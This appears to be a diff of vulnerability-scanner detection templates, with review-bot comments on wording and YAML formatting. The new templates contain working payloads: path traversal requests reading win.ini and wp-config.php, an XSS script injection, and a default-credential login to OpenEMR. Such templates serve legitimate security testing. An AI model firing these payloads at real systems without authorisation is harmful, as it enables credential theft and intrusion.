diff --git a/.new-additions b/.new-additions
index 21e6e91b9f..f460e333fc 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,3 +1,5 @@
+cves/2010/CVE-2010-4239.yaml
+cves/2018/CVE-2018-5715.yaml
cves/2019/CVE-2019-16996.yaml
cves/2021/CVE-2021-44077.yaml
cves/2021/CVE-2021-44515.yaml
@@ -6,9 +8,15 @@ cves/2022/CVE-2022-0208.yaml
cves/2022/CVE-2022-0595.yaml
cves/2022/CVE-2022-1020.yaml
cves/2022/CVE-2022-1054.yaml
+cves/2022/CVE-2022-1119.yaml
cves/2022/CVE-2022-27849.yaml
+default-logins/openemr/openemr-default-login.yaml
+exposed-panels/synapse-mobility-panel.yaml
+exposures/configs/azure-domain-tenant.yaml
exposures/configs/webpack-config.yaml
exposures/files/readme-md.yaml
+miscellaneous/firebase-database-extractor.yaml
+technologies/microsoft/microsoft-sharepoint-detect.yaml
token-spray/api-hirak-rates.yaml
vulnerabilities/other/WSO2-2019-0598.yaml
vulnerabilities/other/avada-xss.yaml
diff --git a/cves/2010/CVE-2010-4239.yaml b/cves/2010/CVE-2010-4239.yaml
new file mode 100644
index 0000000000..6f3303143c
--- /dev/null
+++ b/cves/2010/CVE-2010-4239.yaml
@@ -0,0 +1,30 @@
+id: CVE-2010-4239
+
+info:
+ name: Tiki Wiki CMS Groupware 5.2 - Local File Inclusion
+ author: 0x_akoko
+ severity: high
+ description: Tiki Wiki CMS Groupware 5.2 has Local File Inclusion
+ reference:
+ - https://dl.packetstormsecurity.net/1009-exploits/tikiwiki52-lfi.txt
+ - https://www.cvedetails.com/cve/CVE-2010-4239
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2010-4239
+ cwe-id: CWE-20
+ tags: cve,cve2010,tikiwiki,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini"
+
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "bit app support"
+ - "fonts"
+ - "extensions"
+ condition: and
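Review bot: The description on the `description:` line restates the name ("has Local File Inclusion") and leaves out what the matcher actually relies on: the single request reads `windows/win.ini` and the three word matchers are Windows-only strings, so a Tiki 5.2 install on Linux produces no finding even though it is affected. Say so in the description so the false negative is understood, e.g. `description: Tiki Wiki CMS Groupware 5.2 is vulnerable to local file inclusion via the language parameter of tiki-jsplugin.php. This check reads win.ini and therefore only fires on Windows hosts.`. The other new templates in this commit reference the NVD entry; `- https://nvd.nist.gov/vuln/detail/CVE-2010-4239` would keep the reference style consistent.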
diff --git a/cves/2016/CVE-2016-3088.yaml b/cves/2016/CVE-2016-3088.yaml
index 787ed1aa4c..ba3b0c90c9 100644
--- a/cves/2016/CVE-2016-3088.yaml
+++ b/cves/2016/CVE-2016-3088.yaml
@@ -1,10 +1,10 @@
id: CVE-2016-3088
info:
- name: ActiveMQ Arbitrary File Write Vulnerability (CVE-2016-3088)
+ name: Apache ActiveMQ Fileserver - Arbitrary File Write
author: fq_hsu
severity: critical
- description: The Fileserver web application in Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request.
+ description: Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files via an HTTP PUT followed by an HTTP MOVE request via the Fileserver web application.
reference:
- https://www.exploit-db.com/exploits/40857
- https://medium.com/@knownsec404team/analysis-of-apache-activemq-remote-code-execution-vulnerability-cve-2016-3088-575f80924f30
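Review bot: The rewritten `description:` line now reads "via an HTTP PUT followed by an HTTP MOVE request via the Fileserver web application", with two "via" clauses stacked on one verb. Suggest `description: Apache ActiveMQ 5.x before 5.14.0 allows remote attackers to upload and execute arbitrary files through the Fileserver web application via an HTTP PUT followed by an HTTP MOVE request.`.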
@@ -38,3 +38,5 @@ requests:
- "status_code_2==200"
- "contains((body_2), '{{randstr}}')"
condition: and
+
+# Enhanced by mp on 2022/04/22
diff --git a/cves/2018/CVE-2018-15961.yaml b/cves/2018/CVE-2018-15961.yaml
index bc85b11ea6..81c40dce42 100644
--- a/cves/2018/CVE-2018-15961.yaml
+++ b/cves/2018/CVE-2018-15961.yaml
@@ -1,7 +1,7 @@
id: CVE-2018-15961
info:
- name: Adobe ColdFusion Unrestricted File Upload RCE
+ name: Adobe ColdFusion - Unrestricted File Upload Remote Code Execution
author: SkyLark-Lab,ImNightmaree
severity: critical
description: Adobe ColdFusion versions July 12 release (2018.0.0.310739), Update 6 and earlier, and Update 14 and earlier have an unrestricted file upload vulnerability. Successful exploitation could lead to arbitrary code execution.
@@ -63,3 +63,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/04/22
diff --git a/cves/2018/CVE-2018-5715.yaml b/cves/2018/CVE-2018-5715.yaml
new file mode 100644
index 0000000000..40451b7b2c
--- /dev/null
+++ b/cves/2018/CVE-2018-5715.yaml
@@ -0,0 +1,40 @@
+id: CVE-2018-5715
+
+info:
+ name: SugarCRM 3.5.1 - Reflected XSS
+ author: edoardottt
+ severity: medium
+ description: phprint.php in SugarCRM 3.5.1 has XSS via a parameter name in the query string (aka a $key variable).
+ reference:
+ - https://www.exploit-db.com/exploits/43683
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-5715
+ metadata:
+ shodan-query: http.html:"SugarCRM Inc. All Rights Reserved"
+ google-dork: intext:"SugarCRM Inc. All Rights Reserved"
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2018-5715
+ cwe-id: CWE-79
+ tags: cve,cve2018,sugarcrm,xss
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '&"/>=&"><< Back
'
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
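Review bot: The first word matcher's single-quoted scalar is split across two lines, with the closing `'` on a line of its own after `<< Back`; YAML folds that line break into a single space, so the matched string ends in a trailing space rather than the intended text, and the match then depends on that space appearing in the response. Keep the scalar on one line: `- '&"/>=&"><< Back'`. If a multi-line value is genuinely needed, a `|-` block scalar makes the exact bytes explicit.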
diff --git a/cves/2018/CVE-2018-7251.yaml b/cves/2018/CVE-2018-7251.yaml
index c44d757775..90f7adb2ad 100644
--- a/cves/2018/CVE-2018-7251.yaml
+++ b/cves/2018/CVE-2018-7251.yaml
@@ -1,16 +1,18 @@
id: CVE-2018-7251
info:
- name: AnchorCMS Error Log Exposure
+ name: Anchor CMS 0.12.3 - Error Log Exposure
author: pdteam
severity: critical
- description: An issue was discovered in config/error.php in Anchor 0.12.3. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as "Too many connections") has occurred.
+ description: |
+ Anchor CMS 0.12.3 is susceptible to an error log exposure vulnerability due to an issue in config/error.php. The error log is exposed at an errors.log URI, and contains MySQL credentials if a MySQL error (such as "Too many connections") has occurred.
reference:
- https://github.com/anchorcms/anchor-cms/issues/1247
- http://www.andmp.com/2018/02/advisory-assigned-CVE-2018-7251-in-anchorcms.html
- https://twitter.com/finnwea/status/965279233030393856
- http://packetstormsecurity.com/files/154723/Anchor-CMS-0.12.3a-Information-Disclosure.html
- https://github.com/anchorcms/anchor-cms/releases/tag/0.12.7
+ - https://nvd.nist.gov/vuln/detail/CVE-2018-7251
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@@ -29,3 +31,6 @@ requests:
- '"message":'
- '"trace":['
condition: and
+
+
+# Enhanced by mp on 2022/04/22
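Review bot: Two blank lines are inserted before the trailer comment here, while the same trailer added elsewhere in this commit (CVE-2016-3088, CVE-2018-15961, CVE-2021-32030, aem-crx-bypass) is preceded by exactly one; CVE-2021-38540 has the same double blank. Drop one blank line in both files so the trailer is formatted uniformly across the repository.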
diff --git a/cves/2020/CVE-2020-16952.yaml b/cves/2020/CVE-2020-16952.yaml
index b33e6468a6..55eec4cab2 100644
--- a/cves/2020/CVE-2020-16952.yaml
+++ b/cves/2020/CVE-2020-16952.yaml
@@ -5,35 +5,37 @@ info:
author: dwisiswant0
severity: high
description: A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'.
- This CVE ID is unique from CVE-2020-16951.
reference:
- - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952
- https://srcincite.io/pocs/cve-2020-16952.py.txt
+ - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952
- https://github.com/rapid7/metasploit-framework/blob/1a341ae93191ac5f6d8a9603aebb6b3a1f65f107/documentation/modules/exploit/windows/http/sharepoint_ssi_viewstate.md
classification:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
cvss-score: 7.8
cve-id: CVE-2020-16952
cwe-id: CWE-346
- tags: cve,cve2020,sharepoint,iis,microsoft
+ tags: cve,cve2020,sharepoint,iis,microsoft,ssi,rce
requests:
- method: GET
path:
- "{{BaseURL}}"
+
matchers-condition: and
matchers:
- type: regex
+ part: body
regex:
- "15\\.0\\.0\\.(4571|5275|4351|5056)"
- "16\\.0\\.0\\.(10337|10364|10366)"
# - "16.0.10364.20001"
condition: or
- part: body
- - type: word
- words:
- - "MicrosoftSharePointTeamServices"
+
+ - type: regex
part: header
+ regex:
+ - "(?i)(Microsoftsharepointteamservices:)"
+
- type: status
status:
- 200
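Review bot: The new header regex `(?i)(Microsoftsharepointteamservices:)` wraps the whole pattern in a capturing group that nothing consumes; the same pattern appears in the new technologies/microsoft/microsoft-sharepoint-detect.yaml. A plain `- "(?i)microsoftsharepointteamservices:"` in both places expresses the same check without suggesting a capture is used. Replacing the removed case-sensitive word matcher with a case-insensitive header-name match is otherwise an improvement; the `part: body` move on the version regex only relocates an existing key.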
diff --git a/cves/2020/CVE-2020-26214.yaml b/cves/2020/CVE-2020-26214.yaml
index 2a9c1df03d..ab5b42a3f3 100644
--- a/cves/2020/CVE-2020-26214.yaml
+++ b/cves/2020/CVE-2020-26214.yaml
@@ -1,10 +1,10 @@
id: CVE-2020-26214
info:
- name: Alerta Authentication Bypass
+ name: Alerta < 8.1.0 - Authentication Bypass
author: CasperGN
severity: critical
- description: Alerta prior to version 8.1.0 is prone to Authentication Bypass when using LDAP as authorization provider and the LDAP server accepts Unauthenticated Bind requests.
+ description: Alerta prior to version 8.1.0 is prone to authentication bypass when using LDAP as an authorization provider and the LDAP server accepts Unauthenticated Bind requests.
reference:
- https://github.com/advisories/GHSA-5hmm-x8q8-w5jh
- https://tools.ietf.org/html/rfc4513#section-5.1.2
@@ -43,4 +43,4 @@ requests:
regex:
- 'name":\s*"Alerta ([0-7]\.[0-9]\.[0-9]|8\.0.[0-9])"'
-# Enhanced by mp on 2022/03/27
+# Enhanced by mp on 2022/04/22
diff --git a/cves/2021/CVE-2021-32030.yaml b/cves/2021/CVE-2021-32030.yaml
index 51cda039a4..a999d024e3 100644
--- a/cves/2021/CVE-2021-32030.yaml
+++ b/cves/2021/CVE-2021-32030.yaml
@@ -4,10 +4,10 @@ info:
name: ASUS GT-AC2900 - Authentication Bypass
author: gy741
severity: critical
- description: The administrator application on ASUS GT-AC2900 devices before 3.0.0.4.386.42643 allows authentication bypass when processing remote input from an unauthenticated user, leading to unauthorized access
- to the administrator interface. This relates to handle_request in router/httpd/httpd.c and auth_check in web_hook.o. An attacker-supplied value of '\0' matches the device's default value of '\0' in some situations.
+ description: "ASUS GT-AC2900 devices before 3.0.0.4.386.42643 allows authentication bypass when processing remote input from an unauthenticated user, leading to unauthorized access to the administrator application. This relates to handle_request in router/httpd/httpd.c and auth_check in web_hook.o. An attacker-supplied value of '\0' matches the device's default value of '\0' in some situations."
reference:
- https://www.atredis.com/blog/2021/4/30/asus-authentication-bypass
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-32030
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
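Review bot: The new double-quoted `description:` contains `'\0'` twice, and inside a YAML double-quoted scalar `\0` is the escape sequence for the NUL character (U+0000), so the parsed description now carries two NUL bytes where the removed plain-scalar form kept the literal backslash-zero text; that can break JSON/markdown report output downstream. Use a block scalar, which does no escape processing: `description: |` followed by the text on the next line, or write the sequence as `\\0` if the double quotes are kept.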
@@ -41,3 +41,5 @@ requests:
- "alias"
- "model_name"
condition: and
+
+# Enhanced by mp on 2022/04/22
diff --git a/cves/2021/CVE-2021-38540.yaml b/cves/2021/CVE-2021-38540.yaml
index 039500eb30..4d9d7ce135 100644
--- a/cves/2021/CVE-2021-38540.yaml
+++ b/cves/2021/CVE-2021-38540.yaml
@@ -4,8 +4,8 @@ info:
name: Apache Airflow - Unauthenticated Variable Import
author: pdteam
severity: critical
- description: The variable import endpoint was not protected by authentication in Airflow >=2.0.0, <2.1.3. This allowed unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs, potentially
- resulting in a denial of service, information disclosure or remote code execution. This issue affects Apache Airflow >=2.0.0, <2.1.3.
+ description: Apache Airflow Airflow >=2.0.0 and <2.1.3 does not protect the variable import endpoint which allows unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs, potentially resulting in a denial of service, information disclosure or remote code execution.
+ remediation: Upgrade to Apache Airflow 2.1.3 or higher.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-38540
classification:
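Review bot: The rewritten `description:` line begins "Apache Airflow Airflow >=2.0.0 and <2.1.3", repeating the product name. Suggest `description: Apache Airflow >=2.0.0 and <2.1.3 does not protect the variable import endpoint, which allows unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs, potentially resulting in a denial of service, information disclosure or remote code execution.`. The added `remediation:` key is a welcome addition and matches the field used in CVE-2021-40438.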
@@ -66,4 +66,7 @@ requests:
- type: word
words:
- - 'You should be redirected automatically to target URL: '
\ No newline at end of file
+ - 'You should be redirected automatically to target URL: '
+
+
+# Enhanced by mp on 2022/04/22
diff --git a/cves/2021/CVE-2021-40438.yaml b/cves/2021/CVE-2021-40438.yaml
index 8265c912c4..f1609e03fa 100644
--- a/cves/2021/CVE-2021-40438.yaml
+++ b/cves/2021/CVE-2021-40438.yaml
@@ -4,7 +4,7 @@ info:
name: Apache <= 2.4.48 Mod_Proxy SSRF
author: pdteam
severity: critical
- description: Apache 2.4.8 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.
+ description: Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.
reference:
- https://firzen.de/building-a-poc-for-cve-2021-40438
- https://httpd.apache.org/security/vulnerabilities_24.html
@@ -14,7 +14,7 @@ info:
cvss-score: 9.0
cve-id: CVE-2021-40438
cwe-id: CWE-918
- remediation: Upgrade to Apache version 2.4.49 or newer.
+ remediation: Upgrade to Apache version 2.4.49 or later.
tags: cve,cve2021,ssrf,apache,mod-proxy
requests:
@@ -29,4 +29,5 @@ requests:
words:
- "Interactsh Server"
-# Enhanced by cs on 2022/02/22
+
+# Enhanced by mp on 2022/04/22
diff --git a/cves/2021/CVE-2021-42013.yaml b/cves/2021/CVE-2021-42013.yaml
index 305ea625ba..923a8bce3e 100644
--- a/cves/2021/CVE-2021-42013.yaml
+++ b/cves/2021/CVE-2021-42013.yaml
@@ -4,10 +4,8 @@ info:
name: Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution
author: nvn1729,0xd0ff9
severity: critical
- description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50. An attacker could use a path traversal attack to map URLs to files outside the expected document root.
- If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. In certain configurations,
- for instance if mod_cgi is enabled, this flaw can lead to remote code execution. This issue only affects Apache 2.4.49 and 2.4.50 and not earlier versions. Note - CVE-2021-42013 is due to an incomplete fix for
- the original vulnerability CVE-2021-41773.
+ description: |
+ A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49 and 2.4.50. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. In certain configurations, for instance if mod_cgi is enabled, this flaw can lead to remote code execution. This issue only affects Apache 2.4.49 and 2.4.50 and not earlier versions. Note - CVE-2021-42013 is due to an incomplete fix for the original vulnerability CVE-2021-41773.
reference:
- https://httpd.apache.org/security/vulnerabilities_24.html
- https://github.com/apache/httpd/commit/5c385f2b6c8352e2ca0665e66af022d6e936db6d
@@ -50,4 +48,4 @@ requests:
words:
- "CVE-2021-42013"
-# Enhanced by mp on 2022/02/27
+# Enhanced by mp on 2022/04/22
diff --git a/cves/2021/CVE-2021-45232.yaml b/cves/2021/CVE-2021-45232.yaml
index 261659a370..954e3ae3d2 100644
--- a/cves/2021/CVE-2021-45232.yaml
+++ b/cves/2021/CVE-2021-45232.yaml
@@ -1,11 +1,10 @@
id: CVE-2021-45232
info:
- name: Apache APISIX Dashboard API Unauthorized Access
+ name: Apache APISIX Dashboard <2.10.1 API Unauthorized Access
author: Mr-xn
severity: critical
- description: In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin.' While all APIs and authentication middleware are developed
- based on framework `droplet`, some API directly use the interface of framework `gin` thus bypassing their authentication.
+ description: "In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin.' While all APIs and authentication middleware are developed based on framework `droplet`, some API directly use the interface of framework `gin` thus bypassing their authentication."
reference:
- https://apisix.apache.org/zh/blog/2021/12/28/dashboard-cve-2021-45232/
- https://github.com/pingpongcult/CVE-2021-45232
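Review bot: The new `name:` value "Apache APISIX Dashboard <2.10.1 API Unauthorized Access" does not follow the "Product < version - Issue" form the rest of this commit adopts (e.g. "Alerta < 8.1.0 - Authentication Bypass", "WordPress Simple File List < 3.2.8 - ..."). Suggest `name: Apache APISIX Dashboard < 2.10.1 - API Unauthorized Access`. The description text keeps the unbalanced backtick in "`gin.'" from the removed lines; if that is not a verbatim quote of the advisory, "`gin`." reads correctly.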
@@ -36,4 +35,4 @@ requests:
status:
- 200
-# Enhanced by mp on 2022/02/28
+# Enhanced by mp on 2022/04/22
diff --git a/cves/2022/CVE-2022-1119.yaml b/cves/2022/CVE-2022-1119.yaml
new file mode 100644
index 0000000000..9655352d6d
--- /dev/null
+++ b/cves/2022/CVE-2022-1119.yaml
@@ -0,0 +1,33 @@
+id: CVE-2022-1119
+
+info:
+ name: WordPress Simple File List < 3.2.8 - Unauthenticated Arbitrary File Download
+ author: random-robbie
+ severity: high
+ description: |
+ The plugin is vulnerable to Arbitrary File Download via the eeFile parameter found in the ~/includes/ee-downloader.php file due to missing controls which makes it possible unauthenticated attackers to supply a path to a file that will subsequently be downloaded
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-1119
+ - https://wpscan.com/vulnerability/5551038f-64fb-44d8-bea0-d2f00f04877e
+ classification:
+ cve-id: CVE-2022-1119
+ cwe-id: CWE-552
+ tags: cve,cve2022,lfi,wordpress
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "DB_NAME"
+ - "DB_PASSWORD"
+ condition: and
+
+ - type: status
+ status:
+ - 200
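Review bot: The `description:` block scalar has a grammatical gap ("makes it possible unauthenticated attackers to supply") and no terminating period, and `classification:` carries only `cve-id`/`cwe-id` while the other new CVE templates in this commit (CVE-2010-4239, CVE-2018-5715) also give `cvss-metrics` and `cvss-score`. Suggest `The plugin is vulnerable to arbitrary file download via the eeFile parameter in ~/includes/ee-downloader.php due to missing access controls, which makes it possible for unauthenticated attackers to supply a path to a file that is subsequently downloaded.` and adding the CVSS fields from the NVD entry already referenced.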
diff --git a/cves/2022/CVE-2022-24112.yaml b/cves/2022/CVE-2022-24112.yaml
index 105ffdbaa9..1284bb17a3 100644
--- a/cves/2022/CVE-2022-24112.yaml
+++ b/cves/2022/CVE-2022-24112.yaml
@@ -1,18 +1,15 @@
id: CVE-2022-24112
info:
- name: Apache APISIX apisix/batch-requests Remote Code Execution
+ name: Apache APISIX - Remote Code Execution
author: Mr-xn
severity: critical
- description: A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. An Apache APISIX apisix/batch-requests plugin allows overwriting the X-REAL-IP header to RCE.
- An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. When the admin key was changed or the port of Admin API was changed to a port different from the data
- panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote
- IP. But due to a bug in the code, this check can be bypassed.
+ description: A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed.
reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2022-24112
- https://www.openwall.com/lists/oss-security/2022/02/11/3
- https://twitter.com/sirifu4k1/status/1496043663704858625
- https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-24112
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@@ -80,4 +77,4 @@ requests:
regex:
- 'GET \/([a-z-]+) HTTP'
-# Enhanced by mp on 2022/03/08
+# Enhanced by mp on 2022/04/22
diff --git a/default-logins/openemr/openemr-default-login.yaml b/default-logins/openemr/openemr-default-login.yaml
new file mode 100644
index 0000000000..5a08aa24f2
--- /dev/null
+++ b/default-logins/openemr/openemr-default-login.yaml
@@ -0,0 +1,46 @@
+id: openemr-default-login
+
+info:
+ name: OpenEMR Default Login
+ author: Geekby
+ description: OpenEMR default login was discovered.
+ severity: high
+ reference:
+ - https://github.com/openemr/openemr-devops/tree/master/docker/openemr/6.1.0/#openemr-official-docker-image
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
+ cvss-score: 8.3
+ cwe-id: CWE-522
+ metadata:
+ fofa-query: app="OpenEMR"
+ shodan-query: http.html:"OpenEMR"
+ tags: openemr,default-login
+
+requests:
+ - raw:
+ - |
+ POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ new_login_session_management=1&languageChoice=1&authUser={{user}}&clearPass={{pass}}&languageChoice=10
+
+ attack: pitchfork
+ payloads:
+ user:
+ - admin
+ pass:
+ - pass
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: header
+ words:
+ - "main.php?token_main="
+ - "OpenEMR"
+ condition: and
+
+ - type: status
+ status:
+ - 302
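Review bot: The form body in the raw request sends `languageChoice` twice (`languageChoice=1` near the start and `languageChoice=10` at the end); unless the duplicate is intentional for this login form, keep a single occurrence so the request is unambiguous about which value the server should see. The `info:` block also lists `description` before `severity`, the reverse of every other template in this commit; moving `severity: high` above `description:` keeps the key order uniform. The CVSS vector and 8.3 score are consistent with each other.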
diff --git a/exposed-panels/openemr-detect.yaml b/exposed-panels/openemr-detect.yaml
index 9461971d07..8d4edd872c 100644
--- a/exposed-panels/openemr-detect.yaml
+++ b/exposed-panels/openemr-detect.yaml
@@ -1,13 +1,14 @@
id: openemr-detect
-
+
info:
name: OpenEMR Product Detect
author: pussycat0x
severity: info
metadata:
- shodan-dork: 'app="OpenEMR"'
+ fofa-query: app="OpenEMR"
+ shodan-query: http.html:"OpenEMR"
tags: panel,openemr
-
+
requests:
- method: GET
path:
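Review bot: The two blank lines replaced at the top and bottom of this hunk render identically before and after, so the change is presumably invisible characters only (trailing spaces or a carriage return); if the new lines carry trailing whitespace, yamllint's trailing-spaces rule will flag them and the lines should be left truly empty. Renaming `shodan-dork` to `shodan-query` and adding `fofa-query` aligns the metadata keys with the new openemr-default-login template.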
diff --git a/exposures/configs/azure-domain-tenant.yaml b/exposures/configs/azure-domain-tenant.yaml
new file mode 100644
index 0000000000..db427a99bb
--- /dev/null
+++ b/exposures/configs/azure-domain-tenant.yaml
@@ -0,0 +1,33 @@
+id: azure-domain-tenant
+
+info:
+ name: Microsoft Azure - Domain Tenant ID
+ author: V0idC0de
+ severity: info
+ description: Checks if the domain is part of an Azure tenant and finds the ID using Azure's OpenID discovery page.
+ tags: azure,microsoft,cloud
+
+
+requests:
+ - raw:
+ - |
+ @Host: https://login.microsoftonline.com:443
+ GET /{{Host}}/v2.0/.well-known/openid-configuration HTTP/1.1
+ Host: login.microsoftonline.com
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "token_endpoint"
+
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - "\"https:\\/\\/login\\.microsoftonline\\.com\\/([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12})"
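Review bot: The `description:` should say that this template sends its request to login.microsoftonline.com rather than to the target host (the `@Host:` override in the raw request), because a tester scoping traffic to the target will otherwise be surprised by the third-party call; e.g. `description: Checks whether the input domain belongs to an Azure AD tenant by querying Microsoft's OpenID discovery endpoint (login.microsoftonline.com) and extracts the tenant ID.`. If the input carries a port, `{{Host}}` presumably still expands to the bare hostname in the path - confirm, since a `host:port` value would produce an invalid discovery URL. There are also two consecutive blank lines after `tags:`; one is the convention in the other new files.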
diff --git a/miscellaneous/firebase-database-extractor.yaml b/miscellaneous/firebase-database-extractor.yaml
new file mode 100644
index 0000000000..3918a2a836
--- /dev/null
+++ b/miscellaneous/firebase-database-extractor.yaml
@@ -0,0 +1,20 @@
+id: firebase-database-extractor
+
+info:
+ name: Firebase Database Extract Check
+ author: rafaelwdornelas
+ severity: info
+ description: Extract Firebase Database
+ tags: firebase,misc
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - "[a-z0-9.-]+\\.firebaseio\\.com"
+ - "[a-z0-9.-]+\\.firebaseapp\\.com"
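Review bot: The `name:` ("Firebase Database Extract Check") and `description:` ("Extract Firebase Database") overstate what the template does: the only content is two body regex extractors that pull `*.firebaseio.com` / `*.firebaseapp.com` hostnames out of the response, and nothing contacts or reads a database. Suggest `name: Firebase Hostname Extractor` and `description: Extracts Firebase (firebaseio.com / firebaseapp.com) hostnames referenced in the response body.` so readers do not expect a data-exposure result.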
diff --git a/misconfiguration/aem/aem-crx-bypass.yaml b/misconfiguration/aem/aem-crx-bypass.yaml
index 823bb90f3f..cdb6438ebc 100644
--- a/misconfiguration/aem/aem-crx-bypass.yaml
+++ b/misconfiguration/aem/aem-crx-bypass.yaml
@@ -1,12 +1,14 @@
id: aem-crx-bypass
info:
- name: AEM CRX Bypass
+ name: AEM Package Manager - Authentication Bypass
author: dhiyaneshDK
+ description: Adobe Experience Manager Package Manager is susceptible to a hard to exploit authentication bypass issue. This issue only potentially impacts AEM on-premise or AEM as a Managed Service if default security configurations are removed.
severity: critical
+ remediation: "Adobe recommends AEM customers review access controls for the CRX package manager path: /etc/packages."
reference:
- https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/
- tags: aem
+ tags: aem,adobe
requests:
- raw:
@@ -40,3 +42,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/04/22
diff --git a/misconfiguration/aem/aem-groovyconsole.yaml b/misconfiguration/aem/aem-groovyconsole.yaml
index a2a388a6ec..2d05325869 100644
--- a/misconfiguration/aem/aem-groovyconsole.yaml
+++ b/misconfiguration/aem/aem-groovyconsole.yaml
@@ -1,14 +1,14 @@
id: aem-groovyconsole
info:
- name: AEM Groovy console enabled
+ name: AEM Groovy Console Discovery
author: Dheerajmadhukar
severity: critical
- description: Groovy console is exposed, RCE is possible.
+ description: An Adobe Experience Manager Groovy console was discovered. This can possibly lead to remote code execution.
reference:
- https://hackerone.com/reports/672243
- https://twitter.com/XHackerx007/status/1435139576314671105
- tags: aem
+ tags: aem,adobe
requests:
- method: GET
@@ -32,4 +32,6 @@ requests:
- type: status
status:
- - 200
\ No newline at end of file
+ - 200
+
+# Enhanced by mp on 2022/04/22
diff --git a/misconfiguration/proxy/metadata-alibaba.yaml b/misconfiguration/proxy/metadata-alibaba.yaml
index c49b80a4a4..fca319f76b 100644
--- a/misconfiguration/proxy/metadata-alibaba.yaml
+++ b/misconfiguration/proxy/metadata-alibaba.yaml
@@ -39,4 +39,5 @@ requests:
part: body
words:
- "zone-id"
-# Enhanced by cs on 2022/02/14
+
+# Enhanced by mp on 2022/04/22
diff --git a/misconfiguration/proxy/metadata-aws.yaml b/misconfiguration/proxy/metadata-aws.yaml
index f69bb60036..4f6f7d9b98 100644
